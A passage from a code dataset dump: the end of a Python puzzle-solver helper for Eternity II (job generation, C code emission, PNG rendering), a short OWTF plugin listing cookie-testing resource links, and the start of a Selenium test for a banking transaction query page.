[]\n\n\n\t\t\tnew_column_width = [1] * (width[depth-1])\n\t\t\tnew_line_height = [1] * (height[depth-1])\n\n\t\t\ttmp_valid_pieces = []\n\n\t\t\tfor old_x, old_y, current_valid_pieces in all_valid_pieces[ depth-1 ]:\n\t\t\t\t\n\t\t\t\t#print(\"Depth\", depth, \"Old coordonates\", old_x,\",\",old_y)\n\n\t\t\t\tlowest_valid_pieces = self.puzzle.board_wh*4\n\t\t\t\tbest_space = None\n\n\t\t\t\t# Look for the space with the minimum possibilities\n\t\t\t\tfor space in range(self.puzzle.board_wh):\n\t\t\t\t\tif len(current_valid_pieces[ space ]) > 1:\n\t\t\t\t\t\tif len(current_valid_pieces[ space ]) < lowest_valid_pieces:\n\t\t\t\t\t\t\tlowest_valid_pieces = len(current_valid_pieces[ space ])\n\t\t\t\t\t\t\tbest_space = space\n\n\t\t\t\tif best_space == None:\n\t\t\t\t\tprint(\"No best_space found, continuing\")\n\t\t\t\t\tcontinue\n\n\n\t\t\t\t# Add the new jobs\n\t\t\t\tnew_x = 0\n\t\t\t\tnew_y = 0\n\t\t\t\tfor p in current_valid_pieces[ best_space ]:\n\t\t\t\t\tnew_valid_pieces = self.filterValidPieces( self.fixPiece( current_valid_pieces, p.p, best_space, p.rotation) )\n\t\t\t\t\tif new_valid_pieces != None:\n\t\t\t\t\t\ttmp_valid_pieces.append( (old_x, new_x, old_y, new_y, new_valid_pieces) )\n\n\t\t\t\t\t\tif orientation == 0:\n\t\t\t\t\t\t\tnew_x += 1\n\t\t\t\t\t\t\tif new_x > new_column_width[old_x]:\n\t\t\t\t\t\t\t\tnew_column_width[old_x] = new_x\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tnew_y += 1\n\t\t\t\t\t\t\tif new_y > new_line_height[old_y]:\n\t\t\t\t\t\t\t\tnew_line_height[old_y] = new_y\n\n\t\t\t\t\n\t\t\t# Adjust the coordinates of the jobs\n\t\t\tnew_column_position = [0]\n\t\t\tfor n in new_column_width:\n\t\t\t\tnew_column_position.append( new_column_position[-1] + n )\n\n\t\t\tnew_line_position = [0]\n\t\t\tfor n in new_line_height:\n\t\t\t\tnew_line_position.append( new_line_position[-1] + n )\n\n\t\t\tfor old_x, new_x, old_y, new_y, valid_pieces in tmp_valid_pieces:\n\t\t\t\tactual_x = new_x+new_column_position[old_x]\n\t\t\t\tactual_y = new_y+new_line_position[old_y]\n\n\t\t\t\t#print(\"Depth\", depth, \"Coordonates\", old_x,old_y, \" -> \", actual_x, actual_y)\n\n\t\t\t\tall_valid_pieces[ depth ].append( (actual_x, actual_y, valid_pieces) )\n\n\n\t\t\twidth[ depth ] = new_column_position[-1]\n\t\t\theight[ depth ] = new_line_position[-1]\n\n\t\t\tprint(\"Depth\", depth, \"Size of the jobs:\", width[depth], \"x\", height[depth], \"=>\", len(all_valid_pieces[ depth ]))\n\t\t\tprint()\n\n\t\t\t# Write the output\n\t\t\toutput = \"\"\n\t\t\tfor x, y, current_valid_pieces in all_valid_pieces[ depth ]:\n\t\t\t\tjobid = str(depth)+\"_\"+str(x)+\"_\"+str(y)\n\t\t\t\textra_fixed=[]\n\t\t\t\tfor space in range(self.puzzle.board_wh):\n\t\t\t\t\tif (len(current_valid_pieces[ space ]) == 1) and (self.puzzle.static_spaces_type[ space ] != \"fixed\"): \n\t\t\t\t\t\tpiece = current_valid_pieces[ space ][0]\n\t\t\t\t\t\textra_fixed.append( (piece.p, space, piece.rotation) )\n\t\t\t\toutput += jobid+\"|\"+str(extra_fixed)+\"\\n\"\n\t\t\t\n\t\t\tjobsfile = open( \"jobs/\"+self.getFileFriendlyName( self.puzzle.name )+\"_\"+str(depth)+\"_\"+str(pre_fixed)+\".jobs.txt\", \"w\" )\n\t\t\tjobsfile.write(output)\n\t\t\tjobsfile.close()\n\n\t\t\tif width[ depth ] > max_width and height[ depth ] > max_height:\n\t\t\t\t\tbreak\n\t\t\t\t\n\t\t\tdepth += 1\n\n\n\t\t#print(\"Len of valid_pieces:\", len(all_valid_pieces[-1]))\n\n\t\treturn all_valid_pieces[-1]\n\n\n\tdef getImages( self, pre_fixed=[] ):\n\n\t\tfilename = \"jobs/\"+self.getFileFriendlyName( self.puzzle.name )+\"_output.txt\"\n\n\t\tif os.path.exists(filename):\n\t\t\t\n\t\t\t# Read the data\n\t\t\tcoordinates_for_depth={}\n\t\t\tfor depth in range(-1, self.puzzle.board_wh):\n\t\t\t\tcoordinates_for_depth[depth] = []\n\n\t\t\tjobsfile = open( filename, \"r\" )\n\t\t\tmax_x = 0\n\t\t\tmax_y = 0\n\t\t\tfor line in jobsfile:\n\t\t\t\tif line.startswith('#'):\n\t\t\t\t\tcontinue\n\t\t\t\tline = line.strip('\\n').strip(' ')\n\t\t\t\tline = line.split(\"|\")\n\t\t\t\tline = line[0].split(\"_\")\n\t\t\t\tdepth=int(line[0])\n\t\t\t\tx=int(line[1])\n\t\t\t\ty=int(line[2])\n\t\t\t\tif x > max_x:\n\t\t\t\t\tmax_x = x\n\t\t\t\tif y > max_y:\n\t\t\t\t\tmax_y = y\n\t\t\t\tcoordinates_for_depth[depth].append( (x, y) )\n\t\t\tjobsfile.close()\n\n\t\t\n\t\t\t# Create the image\n\t\t\tfor depth in range(-1, self.puzzle.board_wh):\n\t\t\t\tif len(coordinates_for_depth[depth]) == 0:\n\t\t\t\t\tcontinue\n\n\t\t\t\tprint( \"Generate Image for depth\", depth )\n\n\t\t\t\t# Create the blank image\n\t\t\t\tw = png.Writer(max_x+1, max_y+1, greyscale=True)\n\t\t\t\timg = []\n\t\t\t\tfor h in range(max_y+1):\n\t\t\t\t\tl = [ 0 ] * (max_x+1)\n\t\t\t\t\timg.append(l)\n\n\t\t\t\t# Insert the jobs\n\t\t\t\tfor x,y in coordinates_for_depth[depth]:\n\t\t\t\t\timg[y][x] = 255\n\n\t\t\t\t# Write the image\n\t\t\t\tf = open(\"jobs/\"+self.getFileFriendlyName( self.puzzle.name )+\"_\"+str(depth)+\".png\", 'wb') # binary mode is important\n\t\t\t\tw.write(f, img)\n\t\t\t\tf.close()\n\n\tdef getColorMap( self, pre_fixed=[] ):\n\n\t\tfilename = \"jobs/depth_014/EternityII_jobs.txt.1664548405.1043289.sorted.tidy.line\"\n\n\t\tif os.path.exists(filename):\n\t\t\t\n\t\t\t# Read the data\n\t\t\tcoordinates_for_depth={}\n\t\t\tfor depth in range(-1, self.puzzle.board_wh):\n\t\t\t\tcoordinates_for_depth[depth] = []\n\n\t\t\tjobsfile = open( filename, \"r\" )\n\t\t\tmax_x = 0\n\t\t\tmax_y = 0\n\t\t\tfor line in jobsfile:\n\t\t\t\tif line.startswith('#'):\n\t\t\t\t\tcontinue\n\t\t\t\tline = line.strip('\\n').strip(' ')\n\t\t\t\tline = line.split(\" \")\n\t\t\t\tline.pop(-1)\n\n\t\t\t\tcoord = line[0].split(\"_\")\n\t\t\t\tdepth=int(coord[0])\n\t\t\t\tx=int(coord[1])\n\t\t\t\ty=int(coord[2])\n\t\t\t\tmax_depth = 1\n\t\t\t\ttotal = 0\n\t\t\t\twhile int(line[max_depth]) > 0:\n\t\t\t\t\tmax_depth +=1\n\t\t\t\t\ttotal += int(line[max_depth])\n\n\t\t\t\tmean_depth = 1\n\t\t\t\ttmp_total = 0\n\t\t\t\twhile int(line[mean_depth]) > 0:\n\t\t\t\t\tmean_depth +=1\n\t\t\t\t\ttmp_total += int(line[mean_depth])\n\t\t\t\t\tif tmp_total > int(0.50 * total):\n\t\t\t\t\t\tbreak\n\t\t\t\t\t\t\n\t\t\t\tif x > max_x:\n\t\t\t\t\tmax_x = x\n\t\t\t\tif y > max_y:\n\t\t\t\t\tmax_y = y\n\t\t\t\tcoordinates_for_depth[depth].append( (x, y, max_depth, mean_depth) )\n\t\t\tjobsfile.close()\n\n\t\t\n\t\t\t# Create the image\n\t\t\tfor depth in range(-1, self.puzzle.board_wh):\n\t\t\t\tif len(coordinates_for_depth[depth]) == 0:\n\t\t\t\t\tcontinue\n\n\t\t\t\tprint( \"Generate Image for depth\", depth )\n\n\t\t\t\t# Create the blank image\n\t\t\t\tw = png.Writer(max_x+1, max_y+1, greyscale=True) #, bitdepth=16)\n\t\t\t\timg = []\n\t\t\t\tfor h in range(max_y+1):\n\t\t\t\t\tl = [ 0 ] * (max_x+1)\n\t\t\t\t\timg.append(l)\n\n\t\t\t\t# Insert the jobs\n\t\t\t\tfor x,y, max_depth, mean_depth in coordinates_for_depth[depth]:\n\t\t\t\t\timg[y][x] = mean_depth\n\n\t\t\t\t# Write the image\n\t\t\t\tf = open(\"jobs/\"+self.getFileFriendlyName( self.puzzle.name )+\"_\"+str(depth)+\"_colored.png\", 'wb') # binary mode is important\n\t\t\t\tw.write(f, img)\n\t\t\t\tf.close()\n\n\t# ----- Generate Scoriste function\n\tdef gen_main_function( self, only_signature=False):\n\n\t\toutput = []\n\n\t\toutput.extend( [ \n\t\t\t(0, \"int main(\"),\n\t\t\t] )\n\n\t\tif only_signature:\n\t\t\toutput.append( (1, ');') )\n\t\t\treturn output\n\n\n\t\toutput.append( (1, \") {\") )\n\t\toutput.extend( [\n\n\t\t\t(1, '' ),\n\t\t\t(1, 'if (signal(SIGINT, sig_handler) == SIG_ERR) printf(\"\\\\nUnable to catch SIGINT\\\\n\");' ),\n\t\t\t(1, 'if (signal(SIGUSR1, sig_handler) == SIG_ERR) printf(\"\\\\nUnable to catch SIGUSR1\\\\n\");' ),\n\t\t\t(1, 'if (signal(SIGUSR2, sig_handler) == SIG_ERR) printf(\"\\\\nUnable to catch SIGUSR2\\\\n\");' ),\n\t\t\t(1, '' ),\n\t\t\t#(1, 'return solve(NULL, NULL);'), \n\t\t\t(1, 'printf(\"Starting\\\\n\");'), \n\t\t\t(1, 'PrintValidPieces( static_valid_pieces );'), \n\t\t\t(1, 'getJobs( global_bigpicture, static_valid_pieces, NULL, 1024, 1024 );'), \n\t\t\t#(1, 'PrintValidPieces( FilterValidPieces( static_valid_pieces ) );'), \n\t\t\t#(1, 'PrintValidPieces( FixPieces(static_valid_pieces,0,0,3) );'), \n\t\t\t#(1, 'PrintValidPieces( FilterValidPieces( FixPieces(static_valid_pieces,0,0,3) ) );'), \n\t\t\t#(1, 'PrintValidPieces( FilterValidPieces( FixPieces(static_valid_pieces,2,15,0) ) );'), \n\t\t\t#(1, 'PrintValidPieces( FilterValidPieces( FixPieces(FilterValidPieces( FixPieces(static_valid_pieces,0,0,3) ),2,15,0) ) );'), \n\t\t\t(1, 'return 0;'), \n\t\t\t(1, '' ),\n\t\t\t(0, '}' ),\n\t\t\t] )\n\t\t\n\t\treturn output\n\n\t\n\t# ----- generate LibGen Header\n\tdef GenerateH( self ):\n\n\t\tgen = open( self.getNameH(temp=True), \"w\" )\n\n\t\tself.writeGen( gen, self.getHeaderH() )\n\n\t\t\n\t\toutput = []\n\n\t\toutput.extend( [\n\t\t\t(0, \"#include \" ),\n\t\t\t(0, \"\" ),\n\t\t\t] )\n\n\t\tself.writeGen( gen, self.getDefinitions(only_signature=True) )\n\n\n\t\tself.writeGen( gen, output )\n\t\t\n\n\t\tself.writeGen( gen, self.gen_getter_setter_function( only_signature=True ) )\n\t\tself.writeGen( gen, self.gen_sig_handler_function(only_signature=True) )\n\t\tself.writeGen( gen, self.gen_AllocateValidPieces_function(only_signature=True) )\n\t\tself.writeGen( gen, self.gen_CopyValidPieces_function(only_signature=True) )\n\t\tself.writeGen( gen, self.gen_FilterValidPieces_function(only_signature=True) )\n\t\tself.writeGen( gen, self.gen_FilterValidPiecesOverwrite_function(only_signature=True) )\n\t\tself.writeGen( gen, self.gen_FixPieces_function(only_signature=True) )\n\t\tself.writeGen( gen, self.gen_FixPiecesOverwrite_function(only_signature=True) )\n\t\tself.writeGen( gen, self.gen_PrintValidPieces_functions(only_signature=True) )\n\t\tself.writeGen( gen, self.gen_getJobs_function(only_signature=True) )\n\t\tself.writeGen( gen, self.gen_do_commands(only_signature=True) )\n\t\tself.writeGen( gen, self.gen_allocate_bigpicture_function( only_signature=True ) )\n\t\tself.writeGen( gen, self.gen_free_bigpicture_function( only_signature=True ) )\n\t\tself.writeGen( gen, self.gen_get_static_valid_pieces_function( only_signature=True ) )\n\t\t\"\"\"\n\t\tself.writeGen( gen, self.gen_set_blackwood_arrays_function( only_signature=True ) )\n\t\tself.writeGen( gen, self.gen_save_best_depth_seen_function( only_signature=True ) )\n\t\tself.writeGen( gen, self.gen_getSolutionURL_function( only_signature=True ) )\n\t\tself.writeGen( gen, self.gen_getBestDepthSeenHeartbeat_function( only_signature=True ) )\n\n\t\tself.writeGen( gen, self.gen_print_url_functions(only_signature=True) )\n\n\t\t\n\t\tself.writeGen( gen, self.gen_print_functions(only_signature=True) )\n\t\tself.writeGen( gen, self.gen_Filter_function( only_signature=True ) )\n\t\tself.writeGen( gen, self.gen_solve_function(only_signature=True) )\n\t\t\"\"\"\n\n\t\tself.writeGen( gen, self.getFooterH() )\n\n\n\t# ----- generate LibGen\n\tdef GenerateC( self, module=None ):\n\n\t\tgen = open( self.getNameC(temp=True, module=module), \"w\" )\n\t\tself.writeGen( gen, self.getHeaderC( module=module ) )\n\n\t\tif module != None:\n\t\t\tmacro_name = module\n\t\telse:\n\t\t\tmacro_name = \"\"\n\n\t\tif macro_name == \"utils\":\n\n\t\t\tself.writeGen( gen, self.getDefinitions() )\n\t\t\n\t\t\toutput = []\n\t\t\toutput.extend( [\n\t\t\t\t(0, \"\"),\n\t\t\t\t] )\n\t\t\tself.writeGen( gen, output )\n\n\t\t\tself.writeGen( gen, self.gen_getter_setter_function( only_signature=False ) )\n\t\t\tself.writeGen( gen, self.gen_sig_handler_function(only_signature=False) )\n\t\t\tself.writeGen( gen, self.gen_do_commands(only_signature=False ) )\n\t\t\tself.writeGen( gen, self.gen_allocate_bigpicture_function( only_signature=False ) )\n\t\t\tself.writeGen( gen, self.gen_free_bigpicture_function( only_signature=False ) )\n\t\t\tself.writeGen( gen, self.gen_get_static_valid_pieces_function( only_signature=False ) )\n\t\t\t\"\"\"\n\t\t\tself.writeGen( gen, self.gen_set_blackwood_arrays_function( only_signature=False ) )\n\t\t\tself.writeGen( gen, self.gen_save_best_depth_seen_function( only_signature=False) )\n\t\t\tself.writeGen( gen, self.gen_getSolutionURL_function( only_signature=False ) )\n\t\t\tself.writeGen( gen, self.gen_getBestDepthSeenHeartbeat_function( only_signature=False ) )\n\t\t\tself.writeGen( gen, self.gen_print_url_functions(only_signature=False) )\n\t\t\tself.writeGen( gen, self.gen_print_functions(only_signature=False) )\n\t\t\t\"\"\"\n\n\n\t\telif macro_name == \"generate\":\n\t\t\tself.writeGen( gen, self.gen_AllocateValidPieces_function(only_signature=False) )\n\t\t\tself.writeGen( gen, self.gen_CopyValidPieces_function(only_signature=False) )\n\t\t\tself.writeGen( gen, self.gen_FilterValidPieces_function(only_signature=False) )\n\t\t\tself.writeGen( gen, self.gen_FilterValidPiecesOverwrite_function(only_signature=False) )\n\t\t\tself.writeGen( gen, self.gen_FixPieces_function(only_signature=False) )\n\t\t\tself.writeGen( gen, self.gen_FixPiecesOverwrite_function(only_signature=False) )\n\t\t\tself.writeGen( gen, self.gen_PrintValidPieces_functions(only_signature=False) )\n\t\t\tself.writeGen( gen, self.gen_getJobs_function(only_signature=False) )\n\t\t\t\"\"\"\n\t\t\tself.writeGen( gen, self.gen_filter_function( only_signature=False ) )\n\t\t\tself.writeGen( gen, self.gen_solve_function(only_signature=False) )\n\t\t\t\"\"\"\n\n\n\t\telif macro_name == \"main\":\n\n\t\t\tself.writeGen( gen, self.gen_main_function(only_signature=False) )\n\n\n\t\tself.writeGen( gen, self.getFooterC( module=module ) )\n\n\t# ----- Self test\n\tdef SelfTest( self ):\n\n\t\tfor d in range(self.puzzle.board_wh):\n\t\t\tpath = \"jobs/depth_\"+\"{:03}\".format(d)\n\t\t\ttry:\n\t\t\t\tos.mkdir(path)\n\t\t\texcept OSError as error:\n\t\t\t\t#print(error)\n\t\t\t\tpass\n\n\t\tsys.stdout.flush()\n\t\t\n\t\t# Start the chrono\n\t\tself.top(\"selftest\")\n\n\t\t\"\"\"\n\t\t# Start the solution thread\n\t\tmyWFN = thread_wfn.Wait_For_Notification_Thread( self, self.puzzle )\n\t\tmyWFN.start()\n\n\t\t# Start the locking thread\n\t\tmyLCA = thread_lca.Leave_CPU_Alone_Thread( self, period=2, desktop=self.DESKTOP )\n\t\t#myLCA.start()\n\t\t\"\"\"\n\n\t\t# Start the input thread\n\t\tmyInput = thread_bp_input.BigPicture_Input_Thread( self.command_handler, self, 0.1 )\n\t\tmyInput.start()\n\n\t\t# Start the periodic thread\n\t\tmyHB = thread_bp_hb.BigPicture_HeartBeat_Thread( self, period=1 )\n\t\tmyHB.start()\n\n\t\tsignal.signal(signal.SIGINT, self.LibExt.sig_handler)\n\t\tsignal.signal(signal.SIGUSR1, self.LibExt.sig_handler)\n\t\tsignal.signal(signal.SIGUSR2, self.LibExt.sig_handler)\n\n\t\t\"\"\"\n\t\t#thread_output_filename = ctypes.c_char_p(\"/tmp/test\".encode('utf-8'))\n\t\tthread_output_filename = None\n\n\t\tcb = self.cb\n\t\tcf = self.cb\n\t\tself.copy_new_arrays_to_cb()\n\t\t\"\"\"\n\n\t\t# Parameters\n\t\tbigpicture = self.global_bigpicture\n\t\tvalid_pieces = None #self.LibExt.get_static_valid_pieces()\n\t\t#valid_pieces = self.LibExt.get_static_valid_pieces()\n\t\tpre_fixed = None\n\t\tmax_width = 128\n\t\tmax_height = 128\n\t\tmax_width = 1024\n\t\tmax_height = 1024\n\n\t\t# Call\n\t\tl = self.gen_getJobs_function( only_signature=True )\n\t\targs = []\n\t\tloc = locals()\n\t\tfor pname in self.getParametersNamesFromSignature(l):\n\t\t\tprint(pname)\n\t\t\targs.append( loc[ pname ] )\n\t\tprint(args)\n\t\tself.LibExtWrapper( self.getFunctionNameFromSignature(l), args, timeit=True )\n\n\n\t\tself.getImages()\n\n\t\t\"\"\"\n\t\tl = self.gen_main_function( only_signature=True )\n\t\targs = []\n\t\tloc = locals()\n\t\tfor pname in self.getParametersNamesFromSignature(l):\n\t\t\targs.append( loc[ pname ] )\n\t\tself.LibExtWrapper( self.getFunctionNameFromSignature(l), args, timeit=True )\n\t\t\"\"\"\n\n\n\t\t\"\"\"\n\n\t\tmyLCA.stop_lca_thread = True\t\n\t\tmyWFN.stop_wfn_thread = True\t\n\t\t\"\"\"\n\t\tmyHB.stop_hb_thread = True\t\n\t\tmyInput.stop_input_thread = True\t\n\n\t\ttop = self.top(\"selftest\", unit=False)\n\t\tif not self.QUIET:\n\t\t\tprint()\n\t\t\tprint( \"Self-Test execution time: \", top )\n\n\t\treturn False\n\n\n\tdef validateCornerRotations( self, rotations):\n\t\t\n\t\t# Validate the 4 corner pieces have different rotations\n\t\tif rotations[1] == rotations[0] or \\\n\t\t\trotations[2] == rotations[0] or rotations[2] == rotations[1] or \\\n\t\t\trotations[3] == rotations[0] or rotations[3] == rotations[1] or rotations[3] == rotations[2]:\n\t\t\treturn False\n\n\t\treturn True\n\n\tdef validateRotations( self, rotations, depth, pieces ):\n\t\t\n\t\t# Validate a maximum of border pieces per rotation\n\t\trotations_count = [[], [], [], []]\n\t\tfor d in range(4, depth):\n\t\t\trotations_count[ rotations[d] ].append(d) # += 1\n\t\t#print(rotations_count)\n\n\t\tif len(rotations_count[0]) > (self.puzzle.board_w-2) or \\\n\t\t\tlen(rotations_count[1]) > (self.puzzle.board_h-2) or \\\n\t\t\tlen(rotations_count[2]) > (self.puzzle.board_w-2) or \\\n\t\t\tlen(rotations_count[3]) > (self.puzzle.board_h-2):\n\t\t\treturn False\n\n\n\t\t# Validate if the border pieces can actually be combined, ie: the pieces edges are even\n\t\tif len(rotations_count[0]) == (self.puzzle.board_w-2):\n\t\t\tedges = [0] * self.puzzle.EDGE_DOMAIN_1_PIECE\n\n\t\t\tfor p in range(4):\n\t\t\t\tif rotations[p] == 0:\n\t\t\t\t\tedges[ pieces[p][1] ] += 1\n\t\t\t\t\tedges[ pieces[p][3] ] += 1\n\t\t\t\tif rotations[p] == 3:\n\t\t\t\t\tedges[ pieces[p][1] ] += 1\n\t\t\t\t\tedges[ pieces[p][3] ] += 1\n\n\t\t\tfor p in rotations_count[0]:\n\t\t\t\tedges[ pieces[p][1] ] += 1\n\t\t\t\tedges[ pieces[p][3] ] += 1\n\n\t\t\tfor e in edges:\n\t\t\t\tif e & 1 != 0:\n\t\t\t\t\treturn False\n\n\t\tif len(rotations_count[1]) == (self.puzzle.board_h-2):\n\t\t\tedges = [0] * self.puzzle.EDGE_DOMAIN_1_PIECE\n\n\t\t\tfor p in range(4):\n\t\t\t\tif rotations[p] == 0:\n\t\t\t\t\tedges[ pieces[p][0] ] += 1\n\t\t\t\t\tedges[ pieces[p][2] ] += 1\n\t\t\t\tif rotations[p] == 1:\n\t\t\t\t\tedges[ pieces[p][0] ] += 1\n\t\t\t\t\tedges[ pieces[p][2] ] += 1\n\n\t\t\tfor p in rotations_count[1]:\n\t\t\t\tedges[ pieces[p][0] ] += 1\n\t\t\t\tedges[ pieces[p][2] ] += 1\n\n\t\t\tfor e in edges:\n\t\t\t\tif e & 1 != 0:\n\t\t\t\t\treturn False\n\n\t\tif len(rotations_count[2]) == (self.puzzle.board_w-2):\n\t\t\tedges = [0] * self.puzzle.EDGE_DOMAIN_1_PIECE\n\n\t\t\tfor p in range(4):\n\t\t\t\tif rotations[p] == 1:\n\t\t\t\t\tedges[ pieces[p][1] ] += 1\n\t\t\t\t\tedges[ pieces[p][3] ] += 1\n\t\t\t\tif rotations[p] == 2:\n\t\t\t\t\tedges[ pieces[p][1] ] += 1\n\t\t\t\t\tedges[ pieces[p][3] ] += 1\n\n\t\t\tfor p in rotations_count[2]:\n\t\t\t\tedges[ pieces[p][1] ] += 1\n\t\t\t\tedges[ pieces[p][3] ] += 1\n\n\t\t\tfor e in edges:\n\t\t\t\tif e & 1 != 0:\n\t\t\t\t\treturn False\n\n\t\t\t\t\n\t\tif len(rotations_count[3]) == (self.puzzle.board_h-2):\n\t\t\tedges = [0] * self.puzzle.EDGE_DOMAIN_1_PIECE\n\n\t\t\tfor p in range(4):\n\t\t\t\tif rotations[p] == 2:\n\t\t\t\t\tedges[ pieces[p][0] ] += 1\n\t\t\t\t\tedges[ pieces[p][2] ] += 1\n\t\t\t\tif rotations[p] == 3:\n\t\t\t\t\tedges[ pieces[p][0] ] += 1\n\t\t\t\t\tedges[ pieces[p][2] ] += 1\n\n\t\t\tfor p in rotations_count[3]:\n\t\t\t\tedges[ pieces[p][0] ] += 1\n\t\t\t\tedges[ pieces[p][2] ] += 1\n\n\t\t\tfor e in edges:\n\t\t\t\tif e & 1 != 0:\n\t\t\t\t\treturn False\n\n\t\treturn True\n\t\n\tdef getRotationsColor( self, rotations, depth, pieces ):\n\t\tresult = 1\n\t\t# Dig into known best scores\n\t\tfor s in self.puzzle.solutions_rotations:\n\t\t\tnope = False\n\t\t\tfor d in range(depth):\n\t\t\t\tif s[d] != rotations[d]:\n\t\t\t\t\tnope = True\n\t\t\t\t\tbreak\n\t\t\tif not nope:\n\t\t\t\tresult = 2\n\t\t\t\treturn result\n\n\t\treturn result\n\n\tdef getImageRotations( self, depth, shift_x, shift_y, width, height, force=False ):\n\t\n\t\tfilename = \"jobs/\"+self.getFileFriendlyName( self.puzzle.name )+\"/d=\"+str(depth)+\"_x=\"+str(shift_x)+\"_y=\"+str(shift_y)+\".png\"\n\t\t\n\t\tif os.path.exists(filename) and not force:\n\t\t\treturn\n\n\t\t# Get the Corners and Borders\n\t\tpieces = []\n\t\tfor p in self.puzzle.pieces:\n\t\t\tif self.puzzle.isPieceCorner(p):\n\t\t\t\tpieces.append(p)\n\t\tfor p in self.puzzle.pieces:\n\t\t\tif not self.puzzle.isPieceCorner(p) and \\\n\t\t\t\t self.puzzle.isPieceBorder(p):\n\t\t\t\tpieces.append(p)\n\t\t\n\t\t#print(pieces)\n\n\t\trotations = [0] * len(pieces)\n\t\t\n\t\tif depth < 4 or depth > len(pieces):\n\t\t\treturn\n\t\t\t\n\t\tdepth_size = 2**depth\n\n\t\t# Empty image\n\t\timg = []\n\t\tfor h in range(height):\n\t\t\tl = [0] * width\n\t\t\timg.append(l)\n\n\t\td_shift = [0] * len(pieces)\n\t\tfor d in range(0, depth):\n\t\t\td_shift[d] = 1<<((depth-1)-d)\n\n\t\tfor y in range(shift_y, shift_y+height):\n\t\t\tif y < 0 or y > depth_size:\n\t\t\t\tcontinue\n\n\t\t\ty_shift = [0] * len(pieces)\n\t\t\tfor d in range(0, depth):\n\t\t\t\ty_shift[d] = int((y & d_shift[d]) != 0)*2\n\n\t\t\t# Print progress\n\t\t\t#print((y-shift_y)*100//height, \"%\")\n\n\t\t\tfor x in range(shift_x, shift_x+width):\n\t\t\t\tif x < 0 or x > depth_size:\n\t\t\t\t\tcontinue\n\n\t\t\t\t# We validate corners rotations first - for speed\n\t\t\t\trotations[0] = int(((x & d_shift[0]) != 0)) + y_shift[0]\n\t\t\t\trotations[1] = int(((x & d_shift[1]) != 0)) + y_shift[1]\n\t\t\t\trotations[2] = int(((x & d_shift[2]) != 0)) + y_shift[2]\n\t\t\t\trotations[3] = int(((x & d_shift[3]) != 0)) + y_shift[3]\n\n\t\t\t\tif not self.validateCornerRotations(rotations):\n\t\t\t\t\tcontinue\n\n\t\t\t\t# Then we validate the borders\n\t\t\t\tfor d in range(4, depth):\n\t\t\t\t\trotations[d] = int(((x & d_shift[d]) != 0)) + y_shift[d]\n\n\t\t\t\t#print(x, y, rotations)\n\n\t\t\t\tif not self.validateRotations(rotations, depth, pieces):\n\t\t\t\t\tcontinue\n\n\t\t\t\timg[y-shift_y][x-shift_x] = self.getRotationsColor(rotations, depth, pieces)\n\t\t# Create folder\n\t\ttry:\n\t\t\tos.mkdir(\"jobs/\"+self.getFileFriendlyName( self.puzzle.name ))\n\t\texcept OSError as error:\n\t\t\t#print(error)\n\t\t\tpass\n\n\t\t# Write the image\n\t\tpalette=[(0x00,0x00,0x00), (0x7f,0x7f,0x7f), (0xff,0x55,0x55), (0x99,0xff,0x99)]\n\t\tw = png.Writer(width, height, palette=palette, bitdepth=2)\n\t\t#w = png.Writer(width, height, greyscale=True)\n\t\tf = open(filename, 'wb') # binary mode is important\n\t\tw.write(f, img)\n\t\tf.close()\n\nif __name__ == \"__main__\":\n\timport data\n\n\tp = data.loadPuzzle()\n\t#p = data.loadPuzzle(extra_fixed=[[0,0,3],[2,9,0]])\n\tif p != None:\n\n\t\tlib = LibBigPicture( p )\n\t\t#while lib.SelfTest():\n\t\t#\tpass\n\t\t#lib.getColorMap()\n\n\t\t# Start the chrono\n\t\tlib.top(\"image\")\n\t\t# 8x8\n\t\t#lib.getImageRotations( 14, 768*4, 768*4, 4096, 4096 )\n\t\t#lib.getImageRotations( 16, (768*4+2048)*4, (768*4+0)*4, 4096, 4096 )\n\t\t#lib.getImageRotations( 18, (768*4+2048)*4*4, (768*4+0)*4*4, 4096, 4096 )\n\t\tlib.getImageRotations( 12, 0, 0, 4096, 4096, force=True )\n\n\t\ttop = lib.top(\"image\", unit=False)\n\t\tprint()\n\t\tprint( \"Self-Test execution time: \", top )\n\n\t\t#lib.getImageRotations( 12, 0, 0, 4096, 4096 )\n\t\t#lib.getImageRotations( 12, 1024, 1024, 1024, 1024 )\n\n# Lapin\n","repo_name":"jfbucas/libblackwood","sub_path":"libbigpicture.py","file_name":"libbigpicture.py","file_ext":"py","file_size_in_byte":67355,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"95"} +{"seq_id":"29391972765","text":"from owtf.managers.resource import get_resources\nfrom owtf.plugin.helper import plugin_helper\n\nDESCRIPTION = \"Cookie Attributes Plugin to assist manual testing\"\n\n\ndef run(PluginInfo):\n resource = get_resources(\"ExternalCookiesAttributes\")\n Content = plugin_helper.resource_linklist(\n \"Online Hash Cracking Resources\", resource\n )\n return Content\n","repo_name":"owtf/owtf","sub_path":"owtf/plugins/web/external/Cookies_attributes@OWTF-SM-002.py","file_name":"Cookies_attributes@OWTF-SM-002.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"en","doc_type":"code","stars":1719,"dataset":"github-code","pt":"95"} +{"seq_id":"24976585378","text":"\"\"\"\n@author: 张强\n@data: 2020-4-20\n\"\"\"\nimport sys\nfrom time import sleep\nimport pytest\nfrom os.path import dirname, abspath\n\nsys.path.insert(0, dirname(dirname(abspath(__file__))))\nfrom page.detailQuery_page import DetailQueryPage\n\n\nclass Test_detailQuery:\n \"\"\"交易明细查询\"\"\"\n\n def test_detailQuery_case(self, browser, base_url):\n \"\"\"\n 名称:交易明细查询\n 步骤:\n 1、打开浏览器,输入测试网址\n 2、点击转账菜单按钮,跳转到转账录入页面\n 3、输入跨行收款账户、收款人姓名、转账金额,点击下一步,进入转账确认页面\n 4、点击获取验证码按钮,并输入收到得正确验证码,点击确定\n 5、跳转到转账成功页面\n 断言:\n 检查页面是否包含返回按钮\n \"\"\"\n detailQueryPage = DetailQueryPage(browser)\n detailQueryPage.get(base_url)\n sleep(1)\n if detailQueryPage.basePage_alert:\n print('调试信息!')\n detailQueryPage.basePage_sure_button.click()\n else:\n print('go on!')\n\n detailQueryPage.menu_account_button.click()\n sleep(1)\n\n detailQueryPage.firstPage_detailquery_link.click()\n sleep(1)\n '''起始时间'''\n detailQueryPage.secondPage_startDate_button.click()\n sleep(1)\n startdates = detailQueryPage.secondPage_startDate_table_buttons\n sevendates = []\n for i in range(0,len(startdates)):\n if startdates[i].get_attribute(\"title\") == \"2016年1月7日\":\n sevendates.append(startdates[i])\n sevendates[0].click()\n\n '''结束时间'''\n 